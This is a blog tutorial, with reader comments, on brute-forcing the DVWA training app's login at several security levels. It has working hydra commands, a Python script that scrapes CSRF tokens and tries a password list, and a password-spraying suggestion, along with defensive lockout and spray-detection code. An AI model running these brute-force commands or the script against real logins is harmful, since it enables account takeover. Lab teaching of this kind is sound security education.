
Brute Forcing Web Logins with DVWA

In this tutorial, I will show you how to beat the Low, Medium and High levels of the brute force challenge within DVWA (Damn Vulnerable Web App).

If you want to follow along and have not yet got DVWA set up, take a look at this tutorial on Setting up a Vulnerable LAMP Server. It will run you through setting up a vulnerable virtual machine and installing DVWA; I have used it as the basis for all my web hacking tutorials on Hemps Tutorials.

I have been meaning to write this tutorial for a while, after the popularity of a previous tutorial, Brute Forcing Passwords with THC-Hydra. That tutorial covers using hydra to brute force a whole bunch of services exposed to the internet, but in its Brute Forcing Webpage Logins section I used a Firefox add-on called Tamper Data as the proxy to intercept the web requests and construct the hydra command.

The problem is that Tamper Data no longer works in Firefox, since Firefox transitioned to a new framework for developing extensions. This means we are going to have to use something else as a proxy to intercept our web requests.

The best replacement for Tamper Data is Burp Suite, used as our proxy to capture the web requests we need to construct our hydra command.

Burp Suite

Burp Suite is a graphical tool for testing web application security. Written in Java, it has various tools that work seamlessly together to support the entire security testing process, from initial mapping and analysis of an application through to finding and exploiting security vulnerabilities.

There are 3 different versions of Burp Suite: Enterprise, Professional and the free Community version. As we are only going to need a fraction of Burp's potential in this tutorial, the free Community version should be just fine.

You can download Burp Suite for Linux, Mac or Windows, or as a Java JAR file (which will basically run on anything that runs Java), over at the Portswigger site.

If you want more information about Burp Suite, check out the talk below, “Web App Pen Testing with Burp Suite” by Jason Nikola from the recent SANS KringleCon.

Low Security

In the Low Security setting the DVWA Brute Force login prompt is just a straightforward HTTP GET request, with nothing in place to block or stop you from hammering it with hydra.

This is exactly the same process I covered in Brute Forcing Passwords with THC-Hydra, but this time I will be using Burp Suite instead of Tamper Data to capture our requests.

Let's get logged into DVWA, which unless it has been changed should use the standard username and password of admin/password, and make a start.

Step By Step Brute Force DVWA (Low Security)

  1. Set DVWA Security to Low

    Start by making sure DVWA's security is set to Low: click the DVWA Security button in the left menu, select Low from the security level drop-down and click Submit.



  2. Click The Brute Force button

    Click the Brute Force button on the menu on the left to enter the Brute Force Section of DVWA.

    DVWA Brute force

  3. Open Burp Suite and Setup Web proxy.

    Open up Burp Suite. Once Burp is loaded, click the Proxy tab, then Options, and make sure you have a Proxy Listener set up.


    This should be set to your localhost, 127.0.0.1:8080. You can adjust this as you need, but if you are using Burp through your local web browser just leave these at the default.

  4. Turn Intercept On

    Within Burp Suite move across to the Intercept tab and make sure the Intercept button is on.



    Burp is now ready to start receiving requests, and all we have left to do is set up Firefox to send its requests to the web server via Burp.

  5. Network Settings in Firefox

    Within Firefox, type about:preferences in the address bar; this should take you directly to the preferences tab.


    Scroll right down to the bottom of the page until you see Network Settings, then click Settings.

  6. Set Proxy

    You should now be in the Connection Settings within Firefox. Set the radio button to Manual proxy configuration. This needs to be set to your localhost on 127.0.0.1 and the port to 8080, unless you changed the port to something other than the default in step 3.

  7. Make a request.

    Now the proxy is all configured, we need to make a request to the DVWA Brute Force page.

    In my example, I used the username UsEr and the password PaSs, then clicked the Login button.

    Brute force login DVWA

  8. Request Received by burp.

    The request should be received by Burp's Proxy.


    DVWA Burp Intercept
    Make a note of this request, as we will need to use information from it to construct our Hydra command later.

  9. Failed Login Message

    In Burp Suite, click the Forward button to forward our intercepted request on to the web server.

    Failed Login Message

    As we did not enter the correct username and password, we get presented with an error message stating Username and/or password incorrect.

    Add this to the notes you took of the request in step 8. It allows us to tell hydra that anything other than this error message must be a valid login.

  10. Construct your hydra command

    Use the data intercepted by Burp to construct your hydra command, as I have done below.

    hydra 192.168.0.20 -V -l admin -P 'QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low"

    I will break this hydra command down for you:

    -V Verbose output, showing the login and password for each attempt in the terminal.
    -l admin Log in using the single login name provided. This could be a capital -L to try a list of usernames instead.
    -P Load passwords from a file; in my case this file is called QuickPasswords.txt.
    http-get-form Tells hydra we want to use a GET request, and is followed by the location of the form we want to brute force. This information was gathered from the request intercepted in step 8.
    username=^USER^&password=^PASS^ This adds place markers in our command where we want hydra to substitute each attempt (just replace the actual username and password you used when logging in with ^USER^ and ^PASS^).
    :F=Username and/or password incorrect. This is the failure message noted in step 9 and tells hydra that anything other than this message must be a valid login.
    H=Cookie: This is the cookie information generated when you log in to DVWA. It is only really needed because of that initial login page on DVWA; in the real world you won't normally be logged in already when you reach a login page.

  11. Run Hydra Command

    Run your hydra command. Depending on the size of the password list used, this should only take a few minutes or so before it finds the correct password.

    Hydra DVWA Low

If you have issues with any of the steps above, please leave me a comment at the bottom of this tutorial and I will give you any help you need to get up and running.

Medium Security

The Medium Security setting extends the Low level by adding a delay of 2 seconds after every failed login.

Re-run the Hydra command you used for Low Security, changing the security setting at the end of the command to medium.

hydra 192.168.0.20 -V -l admin -P 'QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=medium"

The Hydra command still works; it just takes a little longer to run, because the PHP has been changed to add the two second delay after every failed login.

Luckily, in DVWA we can easily check the PHP source code for all security levels: just click the View Source button at the bottom of the DVWA window. This displays the PHP source, which shows the sleep( 2 ) call on a failed login, as pictured below.

This shows that adding a delay on failed logins is not a deterrent or adequate protection against a brute force attack. The delay only increases the time needed to perform the attack; it slows the attack down without stopping it.

High Security

Switching to the High Security level in DVWA extends the Medium level by making the delay after a failed login a random number of seconds between 0 and 4. The developer has also introduced an anti Cross-Site Request Forgery (CSRF) token.

If you just re-run the hydra command as we did for Medium Security, changing the security= at the end of the command to high as below...

hydra 192.168.0.20 -V -l admin -P '/home/vreality/Downloads/QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=high"

Hydra's output will be wrong: it reports that it has found 16 valid passwords. Every request now comes back with a CSRF error instead of the Username and/or password incorrect. message hydra was told to look for, so each attempt looks like a successful login.

DVWA on high does not work with Hydra

Before going any further, let's use Firefox's Inspector by right-clicking the webpage within Firefox, choosing Inspect Element, and taking a look at the HTML.

Drill down in Inspect Element until you find the HTML for the login form. Notice there is now a hidden field with the name user_token being submitted with our GET request.

HTML for DVWA Brute Force Login on High

If you change type="hidden" to type="text" you should see the hidden box render in your web browser.

Unhidden user token

If you remove all the characters from this un-hidden box and try to log in, we get a new error message stating CSRF token is incorrect.

CSRF token is invalid

Making Burp intercept a login attempt shows the user_token with a string of alphanumeric characters added to the end of the GET request.

Forward on the intercepted request and have another go at logging in; notice that the user_token= has changed to another random alphanumeric string.

This is the CSRF token. It is used to vouch for the origin of the request being received by the server: an unguessable random value generated by the server, which is sent along with our GET request.

On the brute force page we are currently looking at, if the CSRF token does not match, our request errors with the message “CSRF token is incorrect”, which we saw just now when we sent a request with all the characters removed from the hidden user_token= field.

CSRF Token Is incorrect.
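To make the token behaviour described above concrete, here is an added Python model of the server side of the High level form; it is not DVWA's code and not from the original post. The token is generated each time the form is rendered, compared in constant time and rotated on every request, and the last function shows why hydra's F= rule misreads the CSRF error as a valid login. Class and function names are hypothetical.

```python
import hmac
import re
import secrets

# Messages exactly as the page quotes them from DVWA.
FAIL_MSG = "Username and/or password incorrect."
CSRF_MSG = "CSRF token is incorrect"
SUCCESS_MSG = "Welcome to the password protected area admin"


class TokenProtectedLogin:
    """Hypothetical stand-in for the server side of the High level form.
    DVWA keeps the expected token in the PHP session; here it is an attribute."""

    def __init__(self, username="admin", password="password"):
        self._creds = (username, password)
        self._expected = None
        self.form_html = self._render()

    def _render(self):
        # A fresh, unguessable token each time the form is rendered.
        self._expected = secrets.token_hex(16)
        return '<input type="hidden" name="user_token" value="%s" />' % self._expected

    def submit(self, username, password, user_token):
        """Handle one GET. The token is checked before the credentials, and a new
        token is issued whatever the outcome, so each token is single use."""
        expected = self._expected
        self.form_html = self._render()
        if not user_token or not hmac.compare_digest(expected, user_token):
            return CSRF_MSG
        if (username, password) == self._creds:
            return SUCCESS_MSG
        return FAIL_MSG


def extract_token(html):
    """What a token-aware client (like the page's script) does: read user_token from the form."""
    m = re.search(r'name="user_token" value="([0-9a-f]+)"', html)
    return m.group(1) if m else ""


def failure_string_check_says_valid(response):
    """Hydra's F= rule: any response that lacks the failure string counts as a valid login."""
    return FAIL_MSG not in response


def run_demo():
    site = TokenProtectedLogin()
    # 1. A client that never sends the hidden field (hydra with the Low level command).
    no_token = site.submit("admin", "letmein", "")
    # 2. Reading the current token out of the form first, then sending it.
    token = extract_token(site.form_html)
    with_token = site.submit("admin", "letmein", token)
    # 3. Replaying the token from step 2: it has been rotated, so it is rejected.
    replayed = site.submit("admin", "letmein", token)
    # 4. A fresh token plus the right password.
    good = site.submit("admin", "password", extract_token(site.form_html))
    return {
        "no_token": no_token,
        "no_token_misread_as_valid": failure_string_check_says_valid(no_token),
        "with_token": with_token,
        "replayed": replayed,
        "good": good,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("%-26s %s" % (key, value))
```

The point for defenders: the token only proves the request came from a client that rendered the form, so it stops cross-site forgery, not a client that reads the page before each attempt.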

We can no longer use hydra alone to brute force DVWA on the High security level, as hydra does not have the ability to collect the CSRF token while making the request, so we have to get a little more creative to get this brute force to work.

There are a few different options for getting around this. Firstly, we could use Burp alone: it can capture the CSRF token and run the brute force against the page using the Intruder tab, but in the Community edition this feature only allows a single thread to run at a time, greatly reducing Burp's attack speed.

You can also combine Burp with Hydra by sending Hydra's traffic through Burp as a proxy. This lets Burp handle the requests and capture the CSRF token, altering Hydra's initial request so that Hydra does not need to be aware of the CSRF token at all; it also bypasses the Intruder limitations of the Community edition.

Lastly, we can have a go at creating our own brute forcing tool, which is the option I thought was most interesting and will be covering below using Python.

If you would like to see a tutorial on using either Burp alone, or Burp and Hydra together, to brute force DVWA on High security, please let me know in the comments below and I will make a separate tutorial for these.

Using Python to Brute Force DVWA (High Security)

While researching this tutorial I came across a post on Medium by Danny Beton, https://medium.com/@dannybeton/dvwa-brute-force-tutorial-high-security-456e6ed3ae39, where he covers step by step creating a Python script that captures the CSRF token and brute forces the login to DVWA on High security.

I did have to make a few changes to the original script from Danny's page to get it working, but only because I was having issues with the password file adding 0x0n (the trailing newline) to the end of each password attempt; I also wanted to see each password tried output to the screen as the script runs.

My edit to Danny's Brute Force Python script

Below is my edited version of Danny's Python script, which I saved as DVWA-BruteForce.py. It is written for Python 2 and the original BeautifulSoup 3 module.

from sys import argv
import requests
from BeautifulSoup import BeautifulSoup as Soup

# give our arguments more semantic friendly names
script, filename, success_message = argv

# set up our target, cookie and session
url = 'http://192.168.0.20/dvwa/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID': 'kjrkqb382512vao219va7sk0s4'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)

'''
checkSuccess
@param: html (String)

Searches the response HTML for our specified success message
'''
def checkSuccess(html):
    # get our soup ready for searching
    soup = Soup(html)
    # check for our success message in the soup
    search = soup.findAll(text=success_message)
    # an empty result means the success message was not on the page
    return bool(search)

# Get the initial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source)
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')

# Display before attack
print 'DVWA URL: ' + url
print 'CSRF Token: ' + csrf_token

# Loop through our provided password file
success = False
with open(filename) as f:
    print 'Running brute force attack...'
    for password in f:
        # strip the trailing newline from the wordlist entry, then show the try
        password = password.strip()
        print 'password tried: ' + password

        # setup the payload
        payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
        r = s.get(url, cookies=cookie, params=payload)
        success = checkSuccess(r.text)

        if not success:
            # if it failed the CSRF token will have changed. Get the new one
            soup = Soup(r.text)
            csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
        else:
            # Success! Show the result
            print 'Password is: ' + password
            break

# We failed, bummer.
if not success:
    print 'Brute force failed. No matches found.'


You will need to install the Python modules BeautifulSoup and requests for the script above to work, as these are not part of the modules pre-installed with Python.

BeautifulSoup is a web scraping library, used here to pull the CSRF token out of the page. Requests is what he used to make the requests to the web server. He also used argv to supply arguments to the script from the command line, but this module already comes installed.

These modules can be installed using pip with the commands below.

sudo pip install requests
sudo pip install beautifulsoup

Also, to get this to work you need to edit the url = line in the script to use the IP address of your DVWA web server, and you need to capture a PHPSESSID using Burp as we did previously in step 8 of the Low Security setting and add your PHPSESSID to the script.

Run the Python script using the command below, adding the password list and the message that is received on a successful login.

python DVWA-BruteForce.py QuickPasswords.txt "Welcome to the password protected area admin"

If the script works you should see output like this:

DVWA High Security Brute Force Script Output.

Impossible Security

Brute force and user enumeration should not be possible at the Impossible security level in DVWA. There is now a lockout feature: if there are five bad logins within 15 minutes, the user account gets locked out.

If the locked-out user tries to log in, even with a valid password, it will say their username or password is incorrect. This should make it impossible to tell whether there is a valid account on the system.

error message from failed login on impossible DVWA Brute Force

If time is not an issue we do have a couple of options here that would eventually brute force the login. We could edit the Python script we used on High Security and add a 15 minute wait after every 4 password tries. This would mean that you only try 16 different passwords an hour, and with a huge wordlist it could take you months or even years to complete.

The other option would be password spraying: this is where you try one password against multiple users, and because you are not hammering a single user you end up not hitting the lockout threshold.
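As an added defensive example (not from the original post and not DVWA's source), the Python below implements the per-account lockout the Impossible level describes, five failures within 15 minutes with the same generic error whether the account is locked or the password is wrong, and a detector that runs over constructed log lines to catch the password spraying pattern that per-account lockout alone does not stop. The log format, the threshold of 5 distinct accounts per source, and all names and addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Lockout thresholds as the page states them for DVWA's Impossible level.
LOCKOUT_ATTEMPTS = 5
LOCKOUT_WINDOW = timedelta(minutes=15)
# Spray threshold is an assumption: failures against this many distinct accounts
# from one source inside the window are treated as spraying.
SPRAY_DISTINCT_USERS = 5
SPRAY_WINDOW = timedelta(minutes=15)
GENERIC_FAIL = "Username and/or password incorrect."


class LoginGuard:
    """Per-account lockout: LOCKOUT_ATTEMPTS failures inside LOCKOUT_WINDOW lock the account."""

    def __init__(self, credentials):
        self._creds = credentials                # {username: password}, constructed
        self._failures = defaultdict(deque)      # username -> timestamps of bad logins

    def is_locked(self, user, now):
        q = self._failures[user]
        while q and now - q[0] >= LOCKOUT_WINDOW:   # forget failures outside the window
            q.popleft()
        return len(q) >= LOCKOUT_ATTEMPTS

    def login(self, user, password, now):
        """Returns (success, message). A locked account gets the same reply as a wrong
        password, so the message cannot be used to confirm the account exists."""
        if self.is_locked(user, now):
            return False, GENERIC_FAIL
        if user in self._creds and self._creds[user] == password:
            return True, "Welcome to the password protected area " + user
        self._failures[user].append(now)
        return False, GENERIC_FAIL


# Constructed log format, one line per attempt: "<iso time> src=<ip> user=<name> result=ok|fail"
LOG_RE = re.compile(r"^(\S+) src=(\S+) user=(\S+) result=(ok|fail)$")


def detect_spraying(log_lines):
    """Flags sources whose failures hit SPRAY_DISTINCT_USERS or more distinct accounts
    inside SPRAY_WINDOW. Returns {src: max distinct accounts seen in one window}."""
    per_src = defaultdict(list)
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                       # ignore lines that do not fit the format
        ts, src, user, result = m.groups()
        if result == "fail":
            per_src[src].append((datetime.fromisoformat(ts), user))
    flagged = {}
    for src, events in per_src.items():
        events.sort()
        window = deque()
        for ts, user in events:
            window.append((ts, user))
            while ts - window[0][0] >= SPRAY_WINDOW:
                window.popleft()
            distinct = len({u for _, u in window})
            if distinct >= SPRAY_DISTINCT_USERS:
                flagged[src] = max(flagged.get(src, 0), distinct)
    return flagged


def run_demo():
    guard = LoginGuard({"admin": "password"})
    t0 = datetime(2024, 1, 1, 12, 0, 0)
    # Five wrong passwords for admin inside 15 minutes: the account locks.
    for i in range(LOCKOUT_ATTEMPTS):
        guard.login("admin", "wrong%d" % i, t0 + timedelta(minutes=i))
    locked = guard.login("admin", "password", t0 + timedelta(minutes=6))
    # Once the failures have aged out of the window the real password works again.
    later = guard.login("admin", "password", t0 + timedelta(minutes=21))
    # Constructed log: 192.0.2.10 sprays one password across six accounts (never
    # five failures on any one account), 198.51.100.7 hammers admin alone.
    users = ["admin", "alice", "bob", "carol", "dave", "erin"]
    log = ["2024-01-01T12:%02d:00 src=192.0.2.10 user=%s result=fail" % (i, u)
           for i, u in enumerate(users)]
    log += ["2024-01-01T12:%02d:00 src=198.51.100.7 user=admin result=fail" % i
            for i in range(5)]
    return {"locked": locked, "later": later, "spray": detect_spraying(log)}


if __name__ == "__main__":
    print(run_demo())
```

In the demo the hammering source trips the per-account lockout but never the spray detector, while the spraying source never trips the lockout and is only caught by counting distinct accounts per source.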

If you would like to see some more information about password spraying, leave me a comment below and I will make sure I add it to the list of future posts.

Homework

Using everything you have just learnt from this tutorial and the Brute Forcing Passwords with THC-Hydra tutorial, set the DVWA security to Low and use Hydra to try and enumerate/brute force the other four user logins, then post your findings in the comments section below.


Hemp

IT and security expert with 20+ years of experience. With over two decades of experience in the dynamic field of Information Technology and security, I have honed my skills to become a leading expert in safeguarding digital landscapes. My passion for technology and an unquenchable thirst for knowledge have driven me to stay at the forefront of the ever-evolving IT industry.

31 thoughts on “Brute Forcing Web Logins with DVWA”

  1. Thanks man. First clear, straight to the point, no frills guide. I'm just starting to look more seriously into this stuff and trying to understand it from the basics on, cheers!

    1. Hi DonPorno, Thanks for the comment.

      That's exactly why I made this guide. If you have any questions drop me a comment on here or over on social media.

      Hemp

    1. Hi Faisel

      Nice write up. The reason this works even on the hard setting is because the CSRF token is broken on the main DVWA login, so medium and high security are basically the same.

      If you are ever interested in guest writing a tutorial hit me up at [email protected].

      Keep up the good work mate

      Hemp

  2. Thanks for your tutorial, it is fantastic!!!!
    Can you show me a tutorial for either using Burp or using Burp and Hydra to brute force DVWA on high security?
    How do you resolve the error in Hydra's output when it found 16 valid passwords??
    Thanks

    1. Hi AVL

      Thanks for your comment.

      A tutorial on just using Burp, or Burp using hydra through a proxy, to brute force DVWA on high security is a good idea. I'll add it to my future tutorials list.

      When you get the 16 valid passwords it usually means you have either got your hydra syntax wrong or, in the case of DVWA on high security, there is a CSRF token in place which hydra can't deal with alone.

      Hope this helps.

      Hemp

  3. Hi
    Sir, my Burp Suite is not intercepting the traffic. I have configured it to no proxy and 127.0.0.1 8080 but it is not capturing anything.
    Without cookies and session id, when I run the script it gives me a wrong password and username pair?
    My script is
    hydra -vV -L usernames.txt -P passwords.txt 127.0.0.1 http-get-form '/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.' -f
    and the output is
    root@kali:~# hydra -vV -L usernames.txt -P passwords.txt 127.0.0.1 http-get-form ‘/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.’ -f
    Hydra v8.6 (c) 2017 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (http://www.thc.org/thc-hydra) starting at 2020-12-29 12:04:08
    [DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:4/p:3), ~1 try per task
    [DATA] attacking http-get-form://127.0.0.1:80//DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.
    [VERBOSE] Resolving addresses … [VERBOSE] resolving done
    [ATTEMPT] target 127.0.0.1 – login “admin” – pass “asdfgh” – 1 of 12 [child 0] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “admin” – pass “password” – 2 of 12 [child 1] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “admin” – pass “qwerty” – 3 of 12 [child 2] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “bob” – pass “asdfgh” – 4 of 12 [child 3] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “bob” – pass “password” – 5 of 12 [child 4] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “bob” – pass “qwerty” – 6 of 12 [child 5] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “khan” – pass “asdfgh” – 7 of 12 [child 6] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “khan” – pass “password” – 8 of 12 [child 7] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “khan” – pass “qwerty” – 9 of 12 [child 8] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “” – pass “asdfgh” – 10 of 12 [child 9] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “” – pass “password” – 11 of 12 [child 10] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “” – pass “qwerty” – 12 of 12 [child 11] (0/0)
    [80][http-get-form] host: 127.0.0.1 login: bob password: password
    [STATUS] attack finished for 127.0.0.1 (valid pair found)
    1 of 1 target successfully completed, 1 valid password found
    Hydra (http://www.thc.org/thc-hydra) finished at 2020-12-29 12:04:09

    1. Hi Abdur,

      Are you saying that you can't capture any traffic with Burp, or just when you use hydra?

      If you can't capture any traffic with Burp, make sure you have the proxy details set up in your web browser.

      If it's the latter, you can use the Hydra_Proxy_HTTP or Hydra_Proxy command to proxy your hydra traffic through Burp.

      Let me know how you get on.

      Hemp

  4. Hello sir, I am getting an error. As I am new to this web app pentesting I am not able to resolve it, please help.

    1. Hi Ninjafurry, thanks for your comments…

      What's the command you are actually trying to run? I think you may have a typo in there causing this parse error.

      Check the command, and if you are still getting this error copy and paste the command here and I'll take a look at it for you.

      Hemp

      1. hydra 192.168.43.124 -V -l admin -P '/usr/share/wordlists/rockyou.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=omi079qgij3pt6rhuojhs4a371; security=low"

        This is the command I am trying

        1. Your command is correct… Just check that the PHPSESSID= and IP address are still correct.

          Hmmm, this is an interesting one. Do you get the same issue when you use a different program like curl?

          Try something like this: curl https://192.168.43.124/dvwa/vulnerablitites/brute/ and see if you get the same error.

          What O/S are you running? Is it fully updated?

          Let me know how you get on…

          Hemp

          1. Yes, PHPSESSID and IP are correct

            While using curl I didn't encounter any error.

            cat /etc/os-release
            PRETTY_NAME=”Kali GNU/Linux Rolling”
            NAME=”Kali GNU/Linux”
            ID=kali
            VERSION=”2021.1″
            VERSION_ID=”2021.1″
            VERSION_CODENAME=”kali-rolling”
            ID_LIKE=debian
            ANSI_COLOR=”1;31″
            HOME_URL=”https://www.kali.org/”
            SUPPORT_URL=”https://forums.kali.org/”
            BUG_REPORT_URL=”https://bugs.kali.org/”

          2. My hydra is already the latest version, 9.1, and I configured DVWA on the local network. I tried to find a solution like ! / but can't solve the error which is coming.

          3. Nope, I didn't follow your instructions to configure DVWA. I think the problem is in the terminal; should I change zsh to bash and try? Or should I try your DVWA setup instructions?

          4. I found a way but I'm not sure if it is right or wrong; if you can confirm it, that will be very helpful.

            sudo hydra 192.168.43.124 -V -l admin -P "/usr/share/wordlists/rockyou.txt" http-get-form 'dvwa/vulnerbality/brute/:username=^USER^;password=^PASS^;Login=Login:F=Username and/or password incorrect,:H=Cookie: PHPSESSID=token; security=low'

            As I am new to this.

          5. Congrats, that's the start to becoming a hacker: tweaking the command to work for your situation.

            Did you get the desired result?

            I’ve compared the two commands you sent me and the only difference I can see is you added sudo to the command and switched the backticks around.
            sudo hydra 192.168.43.124 -V -l admin -P /usr/share/wordlists/rockyou.txthttp-get-form dvwa/vulnerbality/brute/:username=^USER^;password=^PASS^;Login=Login:F=Username and/or password incorrect,:H=Cookie: PHPSESSID=token; security=low

            Interested to know though, if the failed response in Burp on low security is now “Username and/or password incorrect,” (with a comma)… or if it was just a typo.

            Just remember Ninjafurry, everyone starts somewhere and it's all about the journey you take.

            Drop me a message here anytime mate and I will try and help if I can.

            Hemp

  5. I’m having a confusing experience – my password guesses are just hanging. If I add errors to the hydra command, I get 16 false positives. However, if the command is correct, it just returns a message that it is attempting the same 16 requests, but extends the time period for the response (see below):

    $ hydra -l admin -P /usr/share/wordlists/rockyou.txt -V 192.168.2.116 http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb2”
    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-15 17:36:44
    [WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
    [DATA] attacking http-get-form://192.168.2.116:80/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb2
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “123456” – 1 of 14344399 [child 0] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “12345” – 2 of 14344399 [child 1] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “123456789” – 3 of 14344399 [child 2] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “password” – 4 of 14344399 [child 3] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “iloveyou” – 5 of 14344399 [child 4] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “princess” – 6 of 14344399 [child 5] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “1234567” – 7 of 14344399 [child 6] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “rockyou” – 8 of 14344399 [child 7] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “12345678” – 9 of 14344399 [child 8] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “abc123” – 10 of 14344399 [child 9] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “nicole” – 11 of 14344399 [child 10] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “daniel” – 12 of 14344399 [child 11] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “babygirl” – 13 of 14344399 [child 12] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “monkey” – 14 of 14344399 [child 13] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “lovely” – 15 of 14344399 [child 14] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “jessica” – 16 of 14344399 [child 15] (0/0)
    [STATUS] 16.00 tries/min, 16 tries in 00:01h, 14344383 to do in 14942:04h, 16 active
    [STATUS] 5.33 tries/min, 16 tries in 00:03h, 14344383 to do in 44826:12h, 16 active

    1. Hi Tom

      Thanks for your comment. Getting the syntax correct on this can be a right pain.
      Try swapping the security and PHPSESSID around…

      Your Command
      /dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb

      Try This !
      ‘/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb; security=low

      Make sure you keep an eye on the spaces between PHPSESSID and security.

      Let me know how you get on.

      Hemp

  6. Hi there,
    I am doing the same thing as you have mentioned, as the brute force part of my ethical hacking project. But my result is not appearing; it keeps on showing the status and tries and nothing happens. Could you please help?
    I am struggling with this issue.

    1. Hi Ambreen

      Could you please paste the command you are using in the comments?

      I can then take a look and hopefully be able to work out what the issue is.

      Hemp

  7. Thanks for your reply. The problem has been resolved now. Hydra 9.1 is buggy; I have upgraded it to 9.2, and it is working all good now.

  8. Hi, could you please help
    hydra 127.0.0.1 -V -l admin -P ‘Quickpasswords.txt’ http-get-form “/dvwa/vulnerabilities/brute/?username=USER&password=PASS&Login=Login:F=Username and/or password incorrect.:H=Cookie:PHPSEED=etl6p7687vhql1ssfnmmpcdk80;security=low”
    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-23 10:55:50
    [ERROR] the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^: F=Username and/or password incorrect.

    I got this error at security level = low. Please help

    1. Hi Priya

      The http-get-form syntax is very unforgiving. However, the error message is stating that you have not added the ^USER^ and ^PASS^ tags to your command; see my example below.

      hydra 192.168.0.20 -V -l admin -P 'QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low"

      Also, make sure you keep an eye on the spacing at the end of the command (:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low).

      If you have not already, check out my more in-depth tutorial on brute forcing passwords with hydra here.

      Hope this helps, come back and let me know how you get on.

      Hemp
